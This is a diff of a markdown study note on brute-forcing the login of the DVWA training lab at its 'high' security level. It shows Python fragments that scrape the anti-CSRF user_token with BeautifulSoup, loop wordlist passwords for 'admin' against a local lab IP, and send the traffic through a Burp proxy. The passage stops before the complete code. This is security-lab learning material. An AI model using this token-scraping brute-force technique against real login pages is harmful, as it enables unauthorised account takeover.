msxieyuqi/DVMA-Learning/BruteForce.md

    * At high level, a function of generation of CSRF Token is added.

            * namely, generateSessionToken(); // Generate Anti-CSRF token
            * that means, the Request Url will contains a 'user_token' by sending to Server.
 And the Sever checks the recieved token firstly, if token is valid, then the Server operates the Sql queries.

 * To achieve the goal at high security level, we need to write a phython script to brute force the password.

-* sending request to server to get response
+* Constuct request to server to get response

 		req = urllib.request.Request(url=requrl,headers=header)

-* for getting ' user_token ' , we need to use BeautifulSoup package to read the reponse content, and parser the page to get 'token'
+* Get ' user_token ' , we need to use BeautifulSoup package to read the reponse content, and parser the page to get 'token'

 		  soup = BeautifulSoup(the_page,"html.parser")
 		  user_token = soup.find('input',{'name':'user_token'})['value']

-* brute force the password by sending request to the server with following URL, which including the param 'user_token' additional
+* Brute force the password by sending request to the server with following URL, which including the param 'user_token' additional

 	   	 requrl = "http://192.168.178.34/vulnerabilities/brute/"+"?username=admin&password="+line.strip()+"&Login=Login&user_token="+user_token

-* for using the Brupsuite to intercept the whole runtime of python code, we need to set the ProxyHandler of those code, so that, the Proxy is same as Brupsuite's.
+* Use the Brupsuite to intercept the whole runtime of python code, we need to set the ProxyHandler of those code, so that, the Proxy is same as Brupsuite's.

       		proxy_handler = urllib.request.ProxyHandler({'http': '127.0.0.1:8080'})
 			opener = urllib.request.build_opener(proxy_handler)

 ##### Complete Code is as following: